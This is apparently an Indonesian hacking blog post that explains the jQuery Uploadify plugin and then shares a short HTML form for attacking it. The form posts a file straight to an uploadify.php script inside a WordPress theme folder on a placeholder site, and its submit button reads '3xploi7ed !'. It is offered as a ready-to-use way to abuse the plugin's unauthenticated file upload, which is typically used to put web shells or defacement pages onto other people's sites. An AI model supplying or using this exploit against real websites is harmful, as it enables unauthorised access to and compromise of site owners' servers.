Script Uploadify HTML






Assalamualaikum Wr. Wb

Kali ini saya akan menshare script uploadify versi html. Pertama uploadify itu apa sih ? saya tau bugnya tapi gak tau pengertiannya nih.. jadi Uploadify itu sebenernya plugins jQuery yang memudahkan kamu mengupload multiple / lebih dari satu file ke website kamu dan menyelesaikan permasalahan multiple upload secara sederhana. 

Banyak yang menganggap Method "Uploadify" biasanya identik dengan xampp, katanya sih kalo pake xampp ribet pak. harus download dulu pindahin dulu ke foldernya terus buka cmd ketik command .. lama kan pak ! *iyadehh -_- * 

Nah untuk memperpendek Method tadi saya berikan script ini supaya lebih simple dan mudah. Tetapi jangan lupa juga untuk mempelajari Method uploadify yang menggunakan Xampp . 

Berikut Scriptnya :


Code:
<form
action="http://web.com/wp-content/themes/xxx/includes/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>


• Request Artikel / Lapor link rusak = here
• Join Grup Facebook = here
• Di Rekomendasikan Menggunakan Google Chrome
Previous
Next Post »
Thanks for your comment